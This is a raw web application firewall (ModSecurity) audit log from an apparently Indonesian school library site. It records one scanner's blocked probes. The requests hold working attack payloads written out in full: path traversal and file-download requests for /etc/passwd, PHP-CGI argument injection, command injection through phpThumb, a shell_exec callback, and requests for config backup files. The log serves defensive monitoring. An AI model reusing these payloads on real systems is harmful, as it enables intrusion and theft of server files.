perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137269098 --4bef930a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4bef930a-E-- --4bef930a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_gambar.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578223152152 1493 (- - -) Stopwatch2: 1745578223152152 1493; combined=469, p1=355, p2=87, p3=0, p4=0, p5=27, sr=88, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bef930a-Z-- --7ffad05a-A-- [25/Apr/2025:17:50:23 +0700] aAto7-XF4ZX3hX-IbN7iQAAAAIY 103.236.140.4 42952 103.236.140.4 8181 --7ffad05a-B-- GET /download_video.php?file=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362565 --7ffad05a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7ffad05a-E-- --7ffad05a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578223349585 1609 (- - -) Stopwatch2: 1745578223349585 1609; combined=507, p1=387, p2=94, p3=0, p4=0, p5=26, sr=135, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ffad05a-Z-- --bf84dd76-A-- [25/Apr/2025:17:50:23 +0700] aAto7-XF4ZX3hX-IbN7iQQAAAJY 103.236.140.4 42952 103.236.140.4 8181 --bf84dd76-B-- GET /download.php?path=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137269101 --bf84dd76-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bf84dd76-E-- --bf84dd76-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578223549309 1479 (- - -) Stopwatch2: 1745578223549309 1479; combined=492, p1=322, p2=143, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf84dd76-Z-- --cc277a67-A-- [25/Apr/2025:17:50:23 +0700] aAto7-XF4ZX3hX-IbN7iQgAAAIs 103.236.140.4 42952 103.236.140.4 8181 --cc277a67-B-- GET /download.php?file=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362568 --cc277a67-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cc277a67-E-- --cc277a67-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578223746952 1379 (- - -) Stopwatch2: 1745578223746952 1379; combined=426, p1=320, p2=79, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc277a67-Z-- --91cc3750-A-- [25/Apr/2025:17:50:23 +0700] aAto7-OdEP6frSVs8Cp47QAAAAI 103.236.140.4 42966 103.236.140.4 8181 --91cc3750-B-- GET /download.php?file=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362571 --91cc3750-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --91cc3750-E-- --91cc3750-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578223944946 3276 (- - -) Stopwatch2: 1745578223944946 3276; combined=1093, p1=506, p2=558, p3=0, p4=0, p5=29, sr=134, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91cc3750-Z-- --0abada28-A-- [25/Apr/2025:17:50:24 +0700] aAto8OOdEP6frSVs8Cp47gAAABA 103.236.140.4 42966 103.236.140.4 8181 --0abada28-B-- GET /download_worksheet.php?action=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137269107 --0abada28-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0abada28-E-- --0abada28-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_worksheet.php?action=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578224144731 2351 (- - -) Stopwatch2: 1745578224144731 2351; combined=607, p1=450, p2=128, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0abada28-Z-- --f693960c-A-- [25/Apr/2025:17:52:23 +0700] aAtpZ-XF4ZX3hX-IbN7jFAAAAIo 103.236.140.4 44612 103.236.140.4 8181 --f693960c-B-- GET /config.inc.php.old HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137270168 --f693960c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f693960c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".inc.php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578343814705 2003 (- - -) Stopwatch2: 1745578343814705 2003; combined=733, p1=346, p2=360, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f693960c-Z-- --6516dd40-A-- [25/Apr/2025:17:52:24 +0700] aAtpaOXF4ZX3hX-IbN7jFgAAAIA 103.236.140.4 44612 103.236.140.4 8181 --6516dd40-B-- GET /config.inc.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137270171 --6516dd40-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6516dd40-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".inc.php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578344213489 1881 (- - -) Stopwatch2: 1745578344213489 1881; combined=730, p1=338, p2=365, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6516dd40-Z-- --f83a7678-A-- [25/Apr/2025:17:52:25 +0700] aAtpaeXF4ZX3hX-IbN7jHwAAAI0 103.236.140.4 44642 103.236.140.4 8181 --f83a7678-B-- GET /index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9363647 --f83a7678-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f83a7678-E-- --f83a7678-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578345618848 3773 (- - -) Stopwatch2: 1745578345618848 3773; combined=1983, p1=473, p2=1398, p3=0, p4=0, p5=112, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f83a7678-Z-- --e710af50-A-- [25/Apr/2025:17:52:26 +0700] aAtpauXF4ZX3hX-IbN7jJAAAAI4 103.236.140.4 44654 103.236.140.4 8181 --e710af50-B-- GET /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137270192 --e710af50-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e710af50-E-- --e710af50-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578346619366 1939 (- - -) Stopwatch2: 1745578346619366 1939; combined=584, p1=370, p2=178, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e710af50-Z-- --c69ad375-A-- [25/Apr/2025:17:52:28 +0700] aAtpbOOdEP6frSVs8Cp5zAAAABY 103.236.140.4 44668 103.236.140.4 8181 --c69ad375-B-- GET /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9363668 --c69ad375-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c69ad375-E-- --c69ad375-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578348224542 2369 (- - -) Stopwatch2: 1745578348224542 2369; combined=812, p1=391, p2=384, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c69ad375-Z-- --3311e426-A-- [25/Apr/2025:17:52:29 +0700] aAtpbeOdEP6frSVs8Cp50AAAABU 103.236.140.4 44682 103.236.140.4 8181 --3311e426-B-- GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137270212 --3311e426-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3311e426-E-- --3311e426-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578349021646 1789 (- - -) Stopwatch2: 1745578349021646 1789; combined=571, p1=358, p2=180, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3311e426-Z-- --5aaf0329-A-- [25/Apr/2025:17:52:29 +0700] aAtpbeOdEP6frSVs8Cp50wAAAA4 103.236.140.4 44682 103.236.140.4 8181 --5aaf0329-B-- GET /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9363680 --5aaf0329-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5aaf0329-E-- --5aaf0329-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578349619453 1807 (- - -) Stopwatch2: 1745578349619453 1807; combined=561, p1=378, p2=147, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5aaf0329-Z-- --5a26f77e-A-- [25/Apr/2025:17:52:31 +0700] aAtpb-OdEP6frSVs8Cp53AAAABA 103.236.140.4 44712 103.236.140.4 8181 --5a26f77e-B-- GET /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9363695 --5a26f77e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: 